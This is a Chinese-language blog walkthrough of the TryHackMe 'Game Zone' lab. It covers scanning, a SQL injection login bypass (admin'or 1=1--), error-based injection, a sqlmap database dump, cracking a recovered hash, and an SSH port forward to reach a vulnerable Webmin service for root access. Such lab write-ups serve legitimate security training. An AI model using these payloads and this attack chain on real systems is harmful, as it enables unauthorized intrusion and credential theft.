<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Thm-Gane_zone - 安全员小周 | ROOT</title>
    <!-- Prism CSS for Synthax Highlighting (White Theme) -->
    <link href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="/assets/css/style.css">
</head>
<body class="article-mode">
    <!-- Sidebar -->
    <aside class="sidebar">
        <div class="brand">
            <span>#_</span> 安全员小周
        </div>

        <div class="nav-group">
        <div class="nav-header">知识库</div>
            <details class="folder-group">
                <summary>鹏城杯2024</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-12-19-鹏城杯2024-训练.html" class="nav-item">鹏城杯2024-训练</a>
            </div></details>
            <details class="folder-group">
                <summary>计算机网络</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-06-21-计算机网络-OSPF.html" class="nav-item">计算机网络-OSPF</a>
            </div></details>
            <details class="folder-group">
                <summary>综合归档</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-01-30-CISCN-2018Picture-misc-wp.html" class="nav-item">CISCN_2018Picture_misc_wp</a>
            
                <a href="/posts/2024-03-13-Rick-pickle.html" class="nav-item">Rick_pickle</a>
            
                <a href="/posts/2024-03-19-Blue靶场实践.html" class="nav-item">Blue靶场实践</a>
            
                <a href="/posts/2024-04-26-github-PicGo-obsidian.html" class="nav-item">github+PicGo+obsidian</a>
            
                <a href="/posts/2024-05-25-刷题记录.html" class="nav-item">刷题记录</a>
            
                <a href="/posts/2024-06-07-计算机组成原理-运算器.html" class="nav-item">计算机组成原理_运算器</a>
            
                <a href="/posts/2024-06-21-计算机组成原理-存储器.html" class="nav-item">计算机组成原理_存储器</a>
            
                <a href="/posts/2024-07-21-redis-利用方式大全.html" class="nav-item">redis_利用方式大全</a>
            
                <a href="/posts/2024-07-27-hackmyvm-coffeeshop.html" class="nav-item">hackmyvm_coffeeshop</a>
            
                <a href="/posts/2024-08-17-log4shell.html" class="nav-item">log4shell</a>
            
                <a href="/posts/2024-09-09-浏览器解码顺序和解析顺序for-xss.html" class="nav-item">浏览器解码顺序和解析顺序for-xss</a>
            
                <a href="/posts/2024-09-16-CORS-跨域资源共享.html" class="nav-item">CORS_跨域资源共享</a>
            
                <a href="/posts/2024-09-17-ip2domain.html" class="nav-item">ip2domain</a>
            
                <a href="/posts/2024-09-17-Oneforall.html" class="nav-item">Oneforall</a>
            
                <a href="/posts/2024-09-17-类.html" class="nav-item">类</a>
            
                <a href="/posts/2024-10-20-activity.html" class="nav-item">activity</a>
            
                <a href="/posts/2024-10-20-manifest.html" class="nav-item">manifest</a>
            
                <a href="/posts/2024-10-20-service.html" class="nav-item">service</a>
            
                <a href="/posts/2024-10-30-2024网鼎杯青龙组.html" class="nav-item">2024网鼎杯青龙组</a>
            
                <a href="/posts/2024-10-30-网鼎杯模拟赛.html" class="nav-item">网鼎杯模拟赛</a>
            
                <a href="/posts/2024-11-04-子域名泛解析解析.html" class="nav-item">子域名泛解析解析</a>
            
                <a href="/posts/2024-11-05-dns欺骗.html" class="nav-item">dns欺骗</a>
            
                <a href="/posts/2024-11-05-mac-泛洪.html" class="nav-item">mac_泛洪</a>
            
                <a href="/posts/2024-11-15-服务.html" class="nav-item">服务</a>
            
                <a href="/posts/2024-11-17-app大致框架.html" class="nav-item">app大致框架</a>
            
                <a href="/posts/2024-11-25-安全狗.html" class="nav-item">安全狗</a>
            
                <a href="/posts/2024-11-30-hash扩展攻击.html" class="nav-item">hash扩展攻击</a>
            
                <a href="/posts/2024-11-30-RCE绕过.html" class="nav-item">RCE绕过</a>
            
                <a href="/posts/2024-11-30-tcp握手.html" class="nav-item">tcp握手</a>
            
                <a href="/posts/2024-11-30-WEBDAv.html" class="nav-item">WEBDAv</a>
            
                <a href="/posts/2024-11-30-短文件名枚举.html" class="nav-item">短文件名枚举</a>
            
                <a href="/posts/2024-12-19-ciscn训练.html" class="nav-item">ciscn训练</a>
            
                <a href="/posts/2024-12-25-新星赛.html" class="nav-item">新星赛</a>
            
                <a href="/posts/2025-01-07-软件安全赛.html" class="nav-item">软件安全赛</a>
            
                <a href="/posts/2025-01-15-jsonp.html" class="nav-item">jsonp</a>
            
                <a href="/posts/2025-01-15-同源策略.html" class="nav-item">同源策略</a>
            
                <a href="/posts/2025-01-19-一次混淆webshell分析.html" class="nav-item">一次混淆webshell分析</a>
            
                <a href="/posts/2025-01-23-hexo博客搭建.html" class="nav-item">hexo博客搭建</a>
            
                <a href="/posts/2025-01-29-SMB445端口利用.html" class="nav-item">SMB445端口利用</a>
            
                <a href="/posts/2025-01-30-域常见信息枚举.html" class="nav-item">域常见信息枚举</a>
            
                <a href="/posts/2025-02-03-红日1.html" class="nav-item">红日1</a>
            
                <a href="/posts/2025-02-05-URLDNS链.html" class="nav-item">URLDNS链</a>
            
                <a href="/posts/2025-02-14-安全服务实习面经.html" class="nav-item">安全服务实习面经</a>
            
                <a href="/posts/2025-02-21-实习该反问什么-.html" class="nav-item">实习该反问什么?</a>
            
                <a href="/posts/2025-04-05-c--内存机制和安全.html" class="nav-item">c++内存机制和安全</a>
            
                <a href="/posts/2025-06-01-pickle.html" class="nav-item">pickle</a>
            
                <a href="/posts/2025-06-02-vllm大模型推理引擎.html" class="nav-item">vllm大模型推理引擎</a>
            
                <a href="/posts/hello-world.html" class="nav-item">我的第一篇安全文章</a>
            </div></details>
            <details class="folder-group">
                <summary>算法</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-20-算法-Init.html" class="nav-item">算法-Init</a>
            
                <a href="/posts/2024-09-20-算法-分治和逆序.html" class="nav-item">算法-分治和逆序</a>
            </div></details>
            <details class="folder-group">
                <summary>漏洞复现</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-11-30-常见服务器解析漏洞.html" class="nav-item">常见服务器解析漏洞</a>
            </div></details>
            <details class="folder-group">
                <summary>湖北大学</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-05-14-湖北大学-奇安信杯完整版wp.html" class="nav-item">湖北大学-奇安信杯完整版wp</a>
            </div></details>
            <details class="folder-group">
                <summary>横向移动</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-08-横向移动-远程创建进程.html" class="nav-item">横向移动-远程创建进程</a>
            
                <a href="/posts/2024-09-10-横向移动-WMI.html" class="nav-item">横向移动-WMI</a>
            </div></details>
            <details class="folder-group">
                <summary>权限提升</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-03-04-权限提升-Linux-passwd提权.html" class="nav-item">权限提升-Linux passwd提权</a>
            
                <a href="/posts/2024-03-09-权限提升-windows计划任务提权.html" class="nav-item">权限提升-windows计划任务提权</a>
            
                <a href="/posts/2024-03-19-权限提升-windows服务提权.html" class="nav-item">权限提升-windows服务提权</a>
            </div></details>
            <details class="folder-group">
                <summary>文件上传</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-18-文件上传-php.html" class="nav-item">文件上传-php</a>
            </div></details>
            <details class="folder-group">
                <summary>数学基础信安总结</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-04-25-数学基础信安总结-一次遗忘的作业.html" class="nav-item">数学基础信安总结-一次遗忘的作业</a>
            </div></details>
            <details class="folder-group">
                <summary>操作系统</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-11-操作系统-api接口.html" class="nav-item">操作系统-api接口</a>
            
                <a href="/posts/2024-09-11-操作系统-启动.html" class="nav-item">操作系统-启动</a>
            
                <a href="/posts/2024-09-11-操作系统-基础认识.html" class="nav-item">操作系统-基础认识</a>
            
                <a href="/posts/2024-10-20-操作系统-内核.html" class="nav-item">操作系统-内核</a>
            
                <a href="/posts/2024-10-20-操作系统-进程.html" class="nav-item">操作系统-进程</a>
            
                <a href="/posts/2024-11-12-操作系统启动实验.html" class="nav-item">操作系统启动实验</a>
            
                <a href="/posts/2024-11-12-操作系统进程管理实验.html" class="nav-item">操作系统进程管理实验</a>
            
                <a href="/posts/2024-12-25-操作系统概念集合.html" class="nav-item">操作系统概念集合</a>
            </div></details>
            <details class="folder-group">
                <summary>外联木马分析</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-12-26-外联木马分析-ciscn.html" class="nav-item">外联木马分析-ciscn</a>
            </div></details>
            <details class="folder-group">
                <summary>域整理</summary>
                <div class="folder-content">
        
                <a href="/posts/2025-01-27-域整理-基础.html" class="nav-item">域整理-基础</a>
            </div></details>
            <details class="folder-group">
                <summary>内网穿透</summary>
                <div class="folder-content">
        
                <a href="/posts/2025-01-14-内网穿透-ligolo使用.html" class="nav-item">内网穿透-ligolo使用</a>
            
                <a href="/posts/2025-01-14-内网穿透-ssh搭建.html" class="nav-item">内网穿透-ssh搭建</a>
            </div></details>
            <details class="folder-group">
                <summary>内网安全</summary>
                <div class="folder-content">
        
                <a href="/posts/2025-01-29-内网横向的一些方式.html" class="nav-item">内网横向的一些方式</a>
            </div></details>
            <details class="folder-group">
                <summary>VULNHUB</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-02-01-vulnhub-vegeta.html" class="nav-item">vulnhub-vegeta</a>
            
                <a href="/posts/2024-07-13-Vulnhub-Aiweb1.html" class="nav-item">Vulnhub-Aiweb1</a>
            
                <a href="/posts/2024-07-14-Vulnhub-Breakout.html" class="nav-item">Vulnhub-Breakout</a>
            </div></details>
            <details class="folder-group">
                <summary>TRYHACKME</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-02-01-Tryhackme-Overpass.html" class="nav-item">Tryhackme-Overpass</a>
            </div></details>
            <details class="folder-group">
                <summary>THM</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-05-14-Thm-alfred.html" class="nav-item">Thm-alfred</a>
            
                <a href="/posts/2024-05-14-Thm-Steel-Mountain.html" class="nav-item">Thm-Steel-Mountain</a>
            
                <a href="/posts/2024-08-17-Thm-Gane-zone.html" class="nav-item">Thm-Gane_zone</a>
            
                <a href="/posts/2024-08-17-Thm-Hackpark.html" class="nav-item">Thm-Hackpark</a>
            
                <a href="/posts/2024-08-17-Thm-Skynet.html" class="nav-item">Thm-Skynet</a>
            </div></details>
            <details class="folder-group">
                <summary>SQLI</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-03-19-sqli-labs靶场-二次注入.html" class="nav-item">sqli-labs靶场-二次注入</a>
            </div></details>
            <details class="folder-group">
                <summary>SQL</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-03-30-sql-学习-day1.html" class="nav-item">sql_学习_day1</a>
            
                <a href="/posts/2024-05-03-sql-索引.html" class="nav-item">sql-索引</a>
            
                <a href="/posts/2024-05-03-sql-表修改和创建.html" class="nav-item">sql-表修改和创建</a>
            
                <a href="/posts/2024-05-03-sql-表增删查改.html" class="nav-item">sql-表增删查改</a>
            
                <a href="/posts/2024-05-03-sql-视图创建.html" class="nav-item">sql-视图创建</a>
            </div></details>
            <details class="folder-group">
                <summary>SNORT</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-12-09-snort-ips.html" class="nav-item">snort-ips</a>
            </div></details>
            <details class="folder-group">
                <summary>PHPMYADMIN</summary>
                <div class="folder-content">
        
                <a href="/posts/2025-01-14-phpmyadmin-getshell姿势.html" class="nav-item">phpmyadmin-getshell姿势</a>
            </div></details>
            <details class="folder-group">
                <summary>NSSCTF</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-01-26-nssctf-round-16web部分wp.html" class="nav-item">nssctf-round#16web部分wp</a>
            </div></details>
            <details class="folder-group">
                <summary>JAVA</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-11-java-包和输入输出.html" class="nav-item">java-包和输入输出</a>
            
                <a href="/posts/2024-09-11-java-数据结构.html" class="nav-item">java-数据结构</a>
            
                <a href="/posts/2024-09-11-java-逻辑结构.html" class="nav-item">java-逻辑结构</a>
            
                <a href="/posts/2025-02-05-java动态代理.html" class="nav-item">java动态代理</a>
            
                <a href="/posts/2025-02-05-java反射.html" class="nav-item">java反射</a>
            
                <a href="/posts/2025-02-05-java反序列化.html" class="nav-item">java反序列化</a>
            </div></details>
            <details class="folder-group">
                <summary>HTB</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-04-25-HTB-LAME.html" class="nav-item">HTB-LAME</a>
            </div></details>
            <details class="folder-group">
                <summary>HACKMYVM</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-15-Hackmyvm-leet.html" class="nav-item">Hackmyvm-leet</a>
            
                <a href="/posts/2024-10-10-Hackmyvm-Lookup.html" class="nav-item">Hackmyvm-Lookup</a>
            </div></details>
            <details class="folder-group">
                <summary>EW</summary>
                <div class="folder-content">
        
                <a href="/posts/2025-01-17-ew-内网.html" class="nav-item">ew-内网</a>
            </div></details>
            <details class="folder-group">
                <summary>DOCKER</summary>
                <div class="folder-content">
        
                <a href="/posts/2025-02-01-docker.html" class="nav-item">docker</a>
            </div></details>
            <details class="folder-group">
                <summary>CTF</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-03-03-sictf-web.html" class="nav-item">sictf_web</a>
            
                <a href="/posts/2024-03-19-CTF长城杯.html" class="nav-item">CTF长城杯</a>
            
                <a href="/posts/2024-03-30-ctf-misc-掌控腾龙杯.html" class="nav-item">ctf-misc-掌控腾龙杯</a>
            
                <a href="/posts/2024-05-14-ctf刷题记录1.html" class="nav-item">ctf刷题记录1</a>
            
                <a href="/posts/2024-05-14-ctf刷题记录2.html" class="nav-item">ctf刷题记录2</a>
            
                <a href="/posts/2024-05-14-ctf刷题记录3.html" class="nav-item">ctf刷题记录3</a>
            
                <a href="/posts/2024-07-21-ctfhub-ssrf基础认证.html" class="nav-item">ctfhub_ssrf基础认证</a>
            
                <a href="/posts/2024-07-28-ctf刷题记录4.html" class="nav-item">ctf刷题记录4</a>
            
                <a href="/posts/2024-09-11-2024-9-11-CTF.html" class="nav-item">2024-9-11-CTF</a>
            
                <a href="/posts/2024-09-12-CTF-Ciscn-cyberpunk.html" class="nav-item">CTF-Ciscn-cyberpunk</a>
            
                <a href="/posts/2024-10-02-CTF刷题buuctf.html" class="nav-item">CTF刷题buuctf</a>
            
                <a href="/posts/2025-01-19-suctf.html" class="nav-item">suctf</a>
            </div></details>
            <details class="folder-group">
                <summary>BEGIN</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-02-11-begin-ctf.html" class="nav-item">begin-ctf</a>
            </div></details>
            <details class="folder-group">
                <summary>ANDROID</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-16-2024-1-2-12-Android-Studio配置.html" class="nav-item">2024-1.2.12-Android-Studio配置</a>
            
                <a href="/posts/2024-09-19-Android-UI设计.html" class="nav-item">Android_UI设计</a>
            </div></details>
            <details class="folder-group">
                <summary>AD域枚举信息</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-09-08-AD域枚举信息-BloodHound.html" class="nav-item">AD域枚举信息-BloodHound</a>
            
                <a href="/posts/2024-09-08-AD域枚举信息-Microsoft控制台MMC.html" class="nav-item">AD域枚举信息-Microsoft控制台MMC</a>
            
                <a href="/posts/2024-09-08-AD域枚举信息-powershell-cmdlet.html" class="nav-item">AD域枚举信息-powershell-cmdlet</a>
            
                <a href="/posts/2024-09-08-AD域枚举信息-命令枚举.html" class="nav-item">AD域枚举信息-命令枚举</a>
            </div></details>
            <details class="folder-group">
                <summary>4</summary>
                <div class="folder-content">
        
                <a href="/posts/2024-04-28-4-28ctf急切刷题.html" class="nav-item">4-28ctf急切刷题</a>
            </div></details></div>

        <div class="user-profile">
            <div class="avatar" style="background:#333; border:1px solid #00ff41; color:#00ff41;">K</div>
            <div style="font-size: 0.9rem; font-weight: 500; color: #00ff41;">安全员小周</div>
        </div>
    </aside>

    <!-- Main Content -->
    <div class="main-wrapper">
        <header class="top-header">
            <div class="breadcrumb">
                ~/home/THM/Thm-Gane_zone ...
            </div>

            <div class="search-container">
                <input type="text" class="search-input" placeholder="grep -r 'keyword' ." id="searchInput">
                <div class="search-results" id="searchResults"></div>
            </div>
        </header>

        <main class="content-area">
            <h1 class="article-title">Thm-Gane_zone</h1>
            <div class="markdown-body">
                <p>靶机信息</p>
<p>Game Zone</p>
<p>系统</p>
<p>linux</p>
<p>信息</p>
<p>前台登陆处sql注入可以直接拿到shell，之后进入隐藏服务可以拿到对应版本的webmin进行提权</p>
<h1>0x00信息收集</h1>
<h3>0x01 端口扫描</h3>
<pre><code class="language-shell">Host is up (0.00037s latency).Not shown: 998 closed portsPORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpMAC Address: 02:9D:BB:F6:4E:39 (Unknown)Nmap done: 1 IP address (1 host up) scanned in 2.35 secondsroot
@ip-10-10-109-100:~### 详细扫描80 22PORT   STATE SERVICE VERSION22/tcp open  ssh
OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)80/tcp open  http
Apache httpd 2.4.18 ((Ubuntu))| http-cookie-flags: |   /: |
PHPSESSID: |_
httponly flag not set|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Game ZoneMAC Address: 02:9D:BB:F6:4E:39 (Unknown)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.13 (99%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.0 - 5.1 (92%), Android 5.1 (92%), Linux 3.10 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT
ADDRESS1   0.40 ms ip-10-10-101-77.eu-west-1.compute.internal (10.10.101.77)
</code></pre>
<blockquote>
<p>*总结一波</p>
</blockquote>
<p>操作系统</p>
<p>Ubuntu 4ubuntu2.7</p>
<p>ssh22</p>
<p>OpenSSH的版本为7.2p2</p>
<p>80 服务器</p>
<p>Apache/2.4.18</p>
<p>语言</p>
<p>php</p>
<p>cookie</p>
<p>httponly flag not set</p>
<h2>0x02 深入端口</h2>
<blockquote>
<p>***总觉得端口太少了 继续扫 nmap全端口扫描</p>
</blockquote>
<p>kscan 爆破一下 –hydra 自动化爆破</p>
<p>kscan</p>
<p><a href="kscan.md">kscan</a></p>
<blockquote>
<p>***没收获 直接走掉</p>
</blockquote>
<h2>0x03 web资产收集</h2>
<blockquote>
<p>**有预感还是要 鹿web<br>利用工具打一圈</p>
</blockquote>
<h3>0x031 目录扫描</h3>
<pre><code class="language-shell">[21:11:33] 403 -  298B  - /.ht_wsr.txt
[21:11:33] 403 -  301B  - /.htaccess.bak1
[21:11:33] 403 -  301B  - /.htaccess.save
[21:11:33] 403 -  303B  - /.htaccess.sample[21:11:33] 403 -  301B  - /.htaccess.orig[21:11:33] 403 -  302B  - /.htaccess_extra
[21:11:33] 403 -  299B  - /.htaccessBAK[21:11:33] 403 -  299B  - /.htaccess_sc[21:11:33] 403 -  301B  - /.htaccess_orig[21:11:33] 403 -  299B  - /.htaccessOLD[21:11:33] 403 -  300B  - /.htaccessOLD2[21:11:33] 403 -  291B  - /.htm
[21:11:33] 403 -  292B  - /.html[21:11:33] 403 -  301B  - /.htpasswd_test
[21:11:33] 403 -  298B  - /.httr-oauth
[21:11:33] 403 -  297B  - /.htpasswds
[21:11:37] 403 -  291B  - /.php
[21:11:37] 403 -  292B  - /.php3
[21:12:43] 301 -  313B  - /images  -&gt;  http://10.10.101.77/images/
[21:12:43] 200 -  868B  - /images/
[21:13:23] 403 -  301B  - /server-status/
[21:13:23] 403 -  300B  - /server-status
</code></pre>
<blockquote>
<p>很奇怪 都没有权限</p>
</blockquote>
<h1>0x10 web_exp</h1>
<blockquote>
<p>只有一个登陆框有功能点 因此我们测试 sql 万能密码</p>
</blockquote>
<p>sql万能密码</p>
<p><a href="sql%E5%88%86%E7%B1%BB.md#%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81">万能密码</a></p>
<pre><code class="language-shell">POST /index.php HTTP/1.1Host: 10.10.12.101Content-Length: 44Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://10.10.12.101Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Referer: http://10.10.12.101/index.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9Cookie: PHPSESSID=o3940qfoad5k0trucelricpo82Connection: closeusername=admin&#39;or 1=1-- &amp;password=&amp;x=33&amp;y=14
</code></pre>
<blockquote>
<p>跳转到一个页面 主要是经营搜索的 这个功能点很可能就有一些搜索的%匹配</p>
</blockquote>
<p><a href="%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/top10%E4%BB%A5%E5%8F%8A%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/%E7%AE%80%E4%BB%8B.md#H2%20%E2%80%8B%EF%BC%883%EF%BC%89%E6%90%9C%E7%B4%A2%E5%9E%8B%E6%B3%A8%E5%85%A5%E7%82%B9">H2 ​（3）搜索型注入点</a></p>
<blockquote>
<p>开始测试 searchitem=2ad123’ 因为这个东西感觉只能是字符的注入<br>因此开始测试 ‘ 发现报错</p>
</blockquote>
<pre><code class="language-sql">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;%&#39;&#39; at line 1
</code></pre>
<p>***’%’’ 可以看出来 就是单引号<br>那就好办 直接一把梭</p>
<blockquote>
<p>但是好久没练习了 借着这个靶场玩一下<br>目前发现可以是回显注入</p>
</blockquote>
<p><a href="sql%E5%88%86%E7%B1%BB.md#%E5%9B%9E%E6%98%BE%E6%B3%A8%E5%85%A5">回显注入</a></p>
<p>不用测了 基本没防护 除了堆注入没有感觉其他都有</p>
<h2>0x11 sqlmap</h2>
<p>sqlmap</p>
<p><a href="%E5%B8%B8%E8%A7%84%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/%E6%BC%8F%E6%B4%9E/sqlmap.md">sqlmap</a></p>
<pre><code class="language-shell">sqlmap -r r.txt --dbms=mysql --dump 
</code></pre>
<p>*直接拖库得到 用户获得hash和用户名</p>
<p>串”ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14”的长度（64个字符），它看起来像是一个SHA-256哈希值</p>
<p>用户:***agent47</p>
<blockquote>
<p>本来想着能不能 直接 拿到shell 因为我发现 这是一个root 用户使用的MySQL<br>但是没办法拿不到<br><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240608195424.png" alt="image.png"></p>
</blockquote>
<h1>0x20 普通权限</h1>
<p>先让我们的开膛手约翰叔叔 爆一下<br><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240607164341.png" alt="image.png"></p>
<blockquote>
<p><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240607163346.png" alt="image.png"><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240607163346.png" alt="image.png"></p>
</blockquote>
<p>直接上线</p>
<h1>0x30 隐藏服务</h1>
<blockquote>
<p>ss -tulpn 可以看到开放了 很多端口 但是我们的namp 扫描时候只<br>开放了80 22 因此做一个端口转发 使得端口服务能够暴露出来</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240609104300.png" alt="image.png"><br>可以看到我们的kali可以和 目标主机通信并且我们已经拿到了<br>对标agent47用户的权限我们完全可以做一个远程端口转发 使得隐藏的服务暴露出来<br>增加我们的攻击面<br>在kali上做一个转发</p>
<pre><code class="language-shell">ssh -L 10000:localhost:10000 agent47@10.10.112.17
</code></pre>
<p>然后进入 查看可以知道是Webmin 1.58</p>
<p>远程代码执行漏洞</p>
<p><a href="Webmin%201.580.md">Webmin 1.580</a></p>
<h1>0X31 Get_shell</h1>
<blockquote>
<p>直接msf 搜索相对应模块</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240609165809.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/k1t0111/blog/main/image/20240609165837.png" alt="image.png"></p>

            </div>
        </main>
    </div>

    <script>
        // Search Logic
        const searchInput = document.getElementById('searchInput');
        const searchResults = document.getElementById('searchResults');
        
        // Focus shortcut
        document.addEventListener('keydown', (e) => {
            if ((e.ctrlKey || e.metaKey) && e.key === 'k') {
                e.preventDefault();
                searchInput.focus();
            }
        });

        let searchIndex = [];

        // Load Index
        fetch('/search.json')
            .then(res => res.json())
            .then(data => {
                searchIndex = data;
            });

        searchInput.addEventListener('input', (e) => {
            const query = e.target.value.toLowerCase();
            if (query.length < 2) {
                searchResults.style.display = 'none';
                return;
            }

            const results = searchIndex.filter(item => 
                item.title.toLowerCase().includes(query) || 
                (item.content && item.content.toLowerCase().includes(query))
            ).slice(0, 8); // Limit to 8

            if (results.length > 0) {
                searchResults.innerHTML = results.map(item => `
                    <a href="${item.link}" class="search-result-item">
                        <div class="search-result-title">📄 ${item.title}</div>
                        <div class="search-result-meta">${item.date} · ${item.category}</div>
                    </a>
                `).join('');
                searchResults.style.display = 'block';
            } else {
                searchResults.innerHTML = '<div style="padding:1rem;color:#9ca3af;text-align:center;">无搜索结果</div>';
                searchResults.style.display = 'block';
            }
        });

        // Close search on outside click
        document.addEventListener('click', (e) => {
            if (!e.target.closest('.search-container')) {
                searchResults.style.display = 'none';
            }
        });

        // Sidebar Logic Enhanced
        document.addEventListener('DOMContentLoaded', function() {
            const currentPath = window.location.pathname;
            
            // 1. Highlight Active Link & Open Parent
            const navLinks = document.querySelectorAll('.nav-item');
            navLinks.forEach(link => {
                let href = link.getAttribute('href');
                // Normalize paths for comparison (remove trailing slashes, ignoring domain)
                if (href && currentPath.indexOf(href) !== -1 && href !== '/') {
                    link.classList.add('active');
                    
                    // Open all parents
                    let parent = link.closest('details');
                    while (parent) {
                        parent.open = true;
                        parent = parent.parentElement.closest('details');
                    }
                }
            });

            // 2. Preserve Sidebar Scroll Position
            const sidebar = document.querySelector('.nav-group');
            if (sidebar) {
                const storedScroll = localStorage.getItem('sidebarScroll');
                if (storedScroll) {
                    sidebar.scrollTop = storedScroll;
                }
                
                // Save scroll on click or before unload
                window.addEventListener('beforeunload', () => {
                    localStorage.setItem('sidebarScroll', sidebar.scrollTop);
                });
            }

            // 3. User Experience: Keep manually opened folders open? 
            // Optional: for now, the "Active Link" logic is usually enough for navigation.
            // If user wants manual persistence, we need IDs for every details element.
        });
    </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-python.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-bash.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-java.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-c.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-cpp.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-sql.min.js"></script>
</body>
</html>
